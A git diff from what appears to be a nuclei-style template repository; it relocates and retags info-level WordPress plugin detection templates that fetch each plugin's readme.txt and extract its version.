a/technologies/wordpress/wordpress-classic-editor.yaml b/technologies/wordpress/plugins/classic-editor.yaml similarity index 87% rename from technologies/wordpress/wordpress-classic-editor.yaml rename to technologies/wordpress/plugins/classic-editor.yaml index a8d6c35a7d..f0f92e04ff 100644 --- a/technologies/wordpress/wordpress-classic-editor.yaml +++ b/technologies/wordpress/plugins/classic-editor.yaml @@ -1,7 +1,7 @@ id: wordpress-classic-editor info: - name: "Classic Editor Detection" + name: Classic Editor Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" payloads: - last_version: wordpress-classic-editor.txt + last_version: helpers/wordpress/plugins/classic-editor.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-classic-widgets.yaml b/technologies/wordpress/plugins/classic-widgets.yaml similarity index 87% rename from technologies/wordpress/wordpress-classic-widgets.yaml rename to technologies/wordpress/plugins/classic-widgets.yaml index 1405d7faaf..2552023912 100644 --- a/technologies/wordpress/wordpress-classic-widgets.yaml +++ b/technologies/wordpress/plugins/classic-widgets.yaml @@ -1,7 +1,7 @@ id: wordpress-classic-widgets info: - name: "Classic Widgets Detection" + name: Classic Widgets Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" payloads: - last_version: wordpress-classic-widgets.txt + last_version: helpers/wordpress/plugins/classic-widgets.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml b/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml similarity index 87% rename from technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml rename to technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 8d0057c22c..25584dcd1c 100644 --- a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml +++ b/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -1,7 +1,7 @@ id: wordpress-click-to-chat-for-whatsapp info: - name: "Click to Chat Detection" + name: Click to Chat Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" payloads: - last_version: wordpress-click-to-chat-for-whatsapp.txt + last_version: helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-cloudflare.yaml b/technologies/wordpress/plugins/cloudflare.yaml similarity index 88% rename from technologies/wordpress/wordpress-cloudflare.yaml rename to technologies/wordpress/plugins/cloudflare.yaml index b64de3464e..2cc06c976f 100644 --- a/technologies/wordpress/wordpress-cloudflare.yaml +++ b/technologies/wordpress/plugins/cloudflare.yaml @@ -1,7 +1,7 @@ id: wordpress-cloudflare info: - name: "Cloudflare Detection" + name: Cloudflare Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt" payloads: - last_version: wordpress-cloudflare.txt + last_version: helpers/wordpress/plugins/cloudflare.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-cmb2.yaml b/technologies/wordpress/plugins/cmb2.yaml similarity index 89% rename from technologies/wordpress/wordpress-cmb2.yaml rename to technologies/wordpress/plugins/cmb2.yaml index e5e1241c8e..68b6651033 100644 --- a/technologies/wordpress/wordpress-cmb2.yaml +++ b/technologies/wordpress/plugins/cmb2.yaml @@ -1,7 +1,7 @@ id: wordpress-cmb2 info: - name: "CMB2 Detection" + name: CMB2 Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" payloads: - last_version: wordpress-cmb2.txt + last_version: helpers/wordpress/plugins/cmb2.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-coblocks.yaml b/technologies/wordpress/plugins/coblocks.yaml similarity index 86% rename from technologies/wordpress/wordpress-coblocks.yaml rename to technologies/wordpress/plugins/coblocks.yaml index 3d3e321c9a..74bf3dfc35 100644 --- a/technologies/wordpress/wordpress-coblocks.yaml +++ b/technologies/wordpress/plugins/coblocks.yaml @@ -1,7 +1,7 @@ id: wordpress-coblocks info: - name: "Page Builder Gutenberg Blocks – CoBlocks Detection" + name: Page Builder Gutenberg Blocks – CoBlocks Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" payloads: - last_version: wordpress-coblocks.txt + last_version: helpers/wordpress/plugins/coblocks.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-code-snippets.yaml b/technologies/wordpress/plugins/code-snippets.yaml similarity index 87% rename from technologies/wordpress/wordpress-code-snippets.yaml rename to technologies/wordpress/plugins/code-snippets.yaml index 066b60d6a0..661a9d0775 100644 --- a/technologies/wordpress/wordpress-code-snippets.yaml +++ b/technologies/wordpress/plugins/code-snippets.yaml @@ -1,7 +1,7 @@ id: wordpress-code-snippets info: - name: "Code Snippets Detection" + name: Code Snippets Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" payloads: - last_version: wordpress-code-snippets.txt + last_version: helpers/wordpress/plugins/code-snippets.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-coming-soon.yaml b/technologies/wordpress/plugins/coming-soon.yaml similarity index 81% rename from technologies/wordpress/wordpress-coming-soon.yaml rename to technologies/wordpress/plugins/coming-soon.yaml index 5f4495e012..a55bf34a3c 100644 --- a/technologies/wordpress/wordpress-coming-soon.yaml +++ b/technologies/wordpress/plugins/coming-soon.yaml @@ -1,7 +1,7 @@ id: wordpress-coming-soon info: - name: "Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode Detection" + name: Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" payloads: - last_version: wordpress-coming-soon.txt + last_version: helpers/wordpress/plugins/coming-soon.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-complianz-gdpr.yaml b/technologies/wordpress/plugins/complianz-gdpr.yaml similarity index 86% rename from technologies/wordpress/wordpress-complianz-gdpr.yaml rename to technologies/wordpress/plugins/complianz-gdpr.yaml index 024405f700..32a4256a91 100644 --- a/technologies/wordpress/wordpress-complianz-gdpr.yaml +++ b/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -1,7 +1,7 @@ id: wordpress-complianz-gdpr info: - name: "Complianz – GDPR/CCPA Cookie Consent Detection" + name: Complianz – GDPR/CCPA Cookie Consent Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" payloads: - last_version: wordpress-complianz-gdpr.txt + last_version: helpers/wordpress/plugins/complianz-gdpr.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml b/technologies/wordpress/plugins/contact-form-7-honeypot.yaml similarity index 86% rename from technologies/wordpress/wordpress-contact-form-7-honeypot.yaml rename to technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 0bdaef58e3..0457fd9707 100644 --- a/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml +++ b/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -1,7 +1,7 @@ id: wordpress-contact-form-7-honeypot info: - name: "Honeypot for Contact Form 7 Detection" + name: Honeypot for Contact Form 7 Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" payloads: - last_version: wordpress-contact-form-7-honeypot.txt + last_version: helpers/wordpress/plugins/contact-form-7-honeypot.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-contact-form-7.yaml b/technologies/wordpress/plugins/contact-form-7.yaml similarity index 87% rename from technologies/wordpress/wordpress-contact-form-7.yaml rename to technologies/wordpress/plugins/contact-form-7.yaml index b9b401873d..a81f2cb7fd 100644 --- a/technologies/wordpress/wordpress-contact-form-7.yaml +++ b/technologies/wordpress/plugins/contact-form-7.yaml @@ -1,7 +1,7 @@ id: wordpress-contact-form-7 info: - name: "Contact Form 7 Detection" + name: Contact Form 7 Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" payloads: - last_version: wordpress-contact-form-7.txt + last_version: helpers/wordpress/plugins/contact-form-7.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-contact-form-cfdb7.yaml b/technologies/wordpress/plugins/contact-form-cfdb7.yaml similarity index 86% rename from technologies/wordpress/wordpress-contact-form-cfdb7.yaml rename to technologies/wordpress/plugins/contact-form-cfdb7.yaml index 287f0e4b10..28a68c3f19 100644 --- a/technologies/wordpress/wordpress-contact-form-cfdb7.yaml +++ b/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -1,7 +1,7 @@ id: wordpress-contact-form-cfdb7 info: - name: "Contact Form 7 Database Addon – CFDB7 Detection" + name: Contact Form 7 Database Addon – CFDB7 Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" payloads: - last_version: wordpress-contact-form-cfdb7.txt + last_version: helpers/wordpress/plugins/contact-form-cfdb7.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-cookie-law-info.yaml b/technologies/wordpress/plugins/cookie-law-info.yaml similarity index 83% rename from technologies/wordpress/wordpress-cookie-law-info.yaml rename to technologies/wordpress/plugins/cookie-law-info.yaml index 545e11395a..beb14b77d7 100644 --- a/technologies/wordpress/wordpress-cookie-law-info.yaml +++ b/technologies/wordpress/plugins/cookie-law-info.yaml @@ -1,7 +1,7 @@ id: wordpress-cookie-law-info info: - name: "CookieYes | GDPR Cookie Consent & Compliance Notice (CCPA Ready) Detection" + name: CookieYes | GDPR Cookie Consent & Compliance Notice (CCPA Ready) Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" payloads: - last_version: wordpress-cookie-law-info.txt + last_version: helpers/wordpress/plugins/cookie-law-info.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-cookie-notice.yaml b/technologies/wordpress/plugins/cookie-notice.yaml similarity index 85% rename from technologies/wordpress/wordpress-cookie-notice.yaml rename to technologies/wordpress/plugins/cookie-notice.yaml index 02346802d5..1fd7be3abf 100644 --- a/technologies/wordpress/wordpress-cookie-notice.yaml +++ b/technologies/wordpress/plugins/cookie-notice.yaml @@ -1,7 +1,7 @@ id: wordpress-cookie-notice info: - name: "Cookie Notice & Compliance for GDPR / CCPA Detection" + name: Cookie Notice & Compliance for GDPR / CCPA Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" payloads: - last_version: wordpress-cookie-notice.txt + last_version: helpers/wordpress/plugins/cookie-notice.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-creame-whatsapp-me.yaml b/technologies/wordpress/plugins/creame-whatsapp-me.yaml similarity index 88% rename from technologies/wordpress/wordpress-creame-whatsapp-me.yaml rename to technologies/wordpress/plugins/creame-whatsapp-me.yaml index b3fe5c67bf..052f58b19b 100644 --- a/technologies/wordpress/wordpress-creame-whatsapp-me.yaml +++ b/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -1,7 +1,7 @@ id: wordpress-creame-whatsapp-me info: - name: "Joinchat Detection" + name: Joinchat Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" payloads: - last_version: wordpress-creame-whatsapp-me.txt + last_version: helpers/wordpress/plugins/creame-whatsapp-me.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml b/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml similarity index 83% rename from technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml rename to technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index efa0135b03..f7d49ec9fd 100644 --- a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml +++ b/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -1,7 +1,7 @@ id: wordpress-creative-mail-by-constant-contact info: - name: "Creative Mail – Easier WordPress & WooCommerce Email Marketing Detection" + name: Creative Mail – Easier WordPress & WooCommerce Email Marketing Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" payloads: - last_version: wordpress-creative-mail-by-constant-contact.txt + last_version: helpers/wordpress/plugins/creative-mail-by-constant-contact.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-custom-css-js.yaml b/technologies/wordpress/plugins/custom-css-js.yaml similarity index 87% rename from technologies/wordpress/wordpress-custom-css-js.yaml rename to technologies/wordpress/plugins/custom-css-js.yaml index 39709630cd..853138b934 100644 --- a/technologies/wordpress/wordpress-custom-css-js.yaml +++ b/technologies/wordpress/plugins/custom-css-js.yaml @@ -1,7 +1,7 @@ id: wordpress-custom-css-js info: - name: "Simple Custom CSS and JS Detection" + name: Simple Custom CSS and JS Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" payloads: - last_version: wordpress-custom-css-js.txt + last_version: helpers/wordpress/plugins/custom-css-js.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-custom-fonts.yaml b/technologies/wordpress/plugins/custom-fonts.yaml similarity index 88% rename from technologies/wordpress/wordpress-custom-fonts.yaml rename to technologies/wordpress/plugins/custom-fonts.yaml index c1fc9304f3..344de449d1 100644 --- a/technologies/wordpress/wordpress-custom-fonts.yaml +++ b/technologies/wordpress/plugins/custom-fonts.yaml @@ -1,7 +1,7 @@ id: wordpress-custom-fonts info: - name: "Custom Fonts Detection" + name: Custom Fonts Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" payloads: - last_version: wordpress-custom-fonts.txt + last_version: helpers/wordpress/plugins/custom-fonts.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-custom-post-type-ui.yaml b/technologies/wordpress/plugins/custom-post-type-ui.yaml similarity index 86% rename from technologies/wordpress/wordpress-custom-post-type-ui.yaml rename to technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c33515f5b..a6de362f6c 100644 --- a/technologies/wordpress/wordpress-custom-post-type-ui.yaml +++ b/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -1,7 +1,7 @@ id: wordpress-custom-post-type-ui info: - name: "Custom Post Type UI Detection" + name: Custom Post Type UI Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" payloads: - last_version: wordpress-custom-post-type-ui.txt + last_version: helpers/wordpress/plugins/custom-post-type-ui.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-disable-comments.yaml b/technologies/wordpress/plugins/disable-comments.yaml similarity index 83% rename from technologies/wordpress/wordpress-disable-comments.yaml rename to technologies/wordpress/plugins/disable-comments.yaml index d91094e7cb..451dc11e9d 100644 --- a/technologies/wordpress/wordpress-disable-comments.yaml +++ b/technologies/wordpress/plugins/disable-comments.yaml @@ -1,7 +1,7 @@ id: wordpress-disable-comments info: - name: "Disable Comments – Remove Comments & Stop Spam [Multi-Site Support] Detection" + name: Disable Comments – Remove Comments & Stop Spam [Multi-Site Support] Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" payloads: - last_version: wordpress-disable-comments.txt + last_version: helpers/wordpress/plugins/disable-comments.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-disable-gutenberg.yaml b/technologies/wordpress/plugins/disable-gutenberg.yaml similarity index 87% rename from technologies/wordpress/wordpress-disable-gutenberg.yaml rename to technologies/wordpress/plugins/disable-gutenberg.yaml index 5cbffa963f..21c86999e1 100644 --- a/technologies/wordpress/wordpress-disable-gutenberg.yaml +++ b/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -1,7 +1,7 @@ id: wordpress-disable-gutenberg info: - name: "Disable Gutenberg Detection" + name: Disable Gutenberg Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" payloads: - last_version: wordpress-disable-gutenberg.txt + last_version: helpers/wordpress/plugins/disable-gutenberg.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-duplicate-page.yaml b/technologies/wordpress/plugins/duplicate-page.yaml similarity index 87% rename from technologies/wordpress/wordpress-duplicate-page.yaml rename to technologies/wordpress/plugins/duplicate-page.yaml index 6e91fcd422..1fea390771 100644 --- a/technologies/wordpress/wordpress-duplicate-page.yaml +++ b/technologies/wordpress/plugins/duplicate-page.yaml @@ -1,7 +1,7 @@ id: wordpress-duplicate-page info: - name: "Duplicate Page Detection" + name: Duplicate Page Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" payloads: - last_version: wordpress-duplicate-page.txt + last_version: helpers/wordpress/plugins/duplicate-page.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-duplicate-post.yaml b/technologies/wordpress/plugins/duplicate-post.yaml similarity index 87% rename from technologies/wordpress/wordpress-duplicate-post.yaml rename to technologies/wordpress/plugins/duplicate-post.yaml index d6454c4f56..9a8eab7540 100644 --- a/technologies/wordpress/wordpress-duplicate-post.yaml +++ b/technologies/wordpress/plugins/duplicate-post.yaml @@ -1,7 +1,7 @@ id: wordpress-duplicate-post info: - name: "Yoast Duplicate Post Detection" + name: Yoast Duplicate Post Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" payloads: - last_version: wordpress-duplicate-post.txt + last_version: helpers/wordpress/plugins/duplicate-post.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-duplicator.yaml b/technologies/wordpress/plugins/duplicator.yaml similarity index 85% rename from technologies/wordpress/wordpress-duplicator.yaml rename to technologies/wordpress/plugins/duplicator.yaml index af955b8d5a..cf6463e43b 100644 --- a/technologies/wordpress/wordpress-duplicator.yaml +++ b/technologies/wordpress/plugins/duplicator.yaml @@ -1,7 +1,7 @@ id: wordpress-duplicator info: - name: "Duplicator – WordPress Migration Plugin Detection" + name: Duplicator – WordPress Migration Plugin Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" payloads: - last_version: wordpress-duplicator.txt + last_version: helpers/wordpress/plugins/duplicator.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml b/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml similarity index 88% rename from technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml rename to technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 8b53cc39ff..7fd496897a 100644 --- a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml +++ b/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -1,7 +1,7 @@ id: wordpress-duracelltomi-google-tag-manager info: - name: "GTM4WP Detection" + name: GTM4WP Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" payloads: - last_version: wordpress-duracelltomi-google-tag-manager.txt + last_version: helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-easy-fancybox.yaml b/technologies/wordpress/plugins/easy-fancybox.yaml similarity index 88% rename from technologies/wordpress/wordpress-easy-fancybox.yaml rename to technologies/wordpress/plugins/easy-fancybox.yaml index 21b4ad5f0b..1ed5d4f5c5 100644 --- a/technologies/wordpress/wordpress-easy-fancybox.yaml +++ b/technologies/wordpress/plugins/easy-fancybox.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-fancybox info: - name: "Easy FancyBox Detection" + name: Easy FancyBox Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/easy-fancybox/readme.txt" payloads: - last_version: wordpress-easy-fancybox.txt + last_version: helpers/wordpress/plugins/easy-fancybox.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-easy-google-fonts.yaml b/technologies/wordpress/plugins/easy-google-fonts.yaml similarity index 87% rename from technologies/wordpress/wordpress-easy-google-fonts.yaml rename to technologies/wordpress/plugins/easy-google-fonts.yaml index 3c3926047d..5203010007 100644 --- a/technologies/wordpress/wordpress-easy-google-fonts.yaml +++ b/technologies/wordpress/plugins/easy-google-fonts.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-google-fonts info: - name: "Easy Google Fonts Detection" + name: Easy Google Fonts Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: easy-google-fonts wpscan: https://wpscan.com/plugin/easy-google-fonts - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/easy-google-fonts/readme.txt" payloads: - last_version: wordpress-easy-google-fonts.txt + last_version: helpers/wordpress/plugins/easy-google-fonts.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-easy-table-of-contents.yaml b/technologies/wordpress/plugins/easy-table-of-contents.yaml similarity index 87% rename from technologies/wordpress/wordpress-easy-table-of-contents.yaml rename to technologies/wordpress/plugins/easy-table-of-contents.yaml index 6c6e9179af..9dc93c7dd0 100644 --- a/technologies/wordpress/wordpress-easy-table-of-contents.yaml +++ b/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-table-of-contents info: - name: "Easy Table of Contents Detection" + name: Easy Table of Contents Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" payloads: - last_version: wordpress-easy-table-of-contents.txt + last_version: helpers/wordpress/plugins/easy-table-of-contents.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-easy-wp-smtp.yaml b/technologies/wordpress/plugins/easy-wp-smtp.yaml similarity index 87% rename from technologies/wordpress/wordpress-easy-wp-smtp.yaml rename to technologies/wordpress/plugins/easy-wp-smtp.yaml index e4c6d594e1..490b686c5c 100644 --- a/technologies/wordpress/wordpress-easy-wp-smtp.yaml +++ b/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-wp-smtp info: - name: "Easy WP SMTP Detection" + name: Easy WP SMTP Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp - 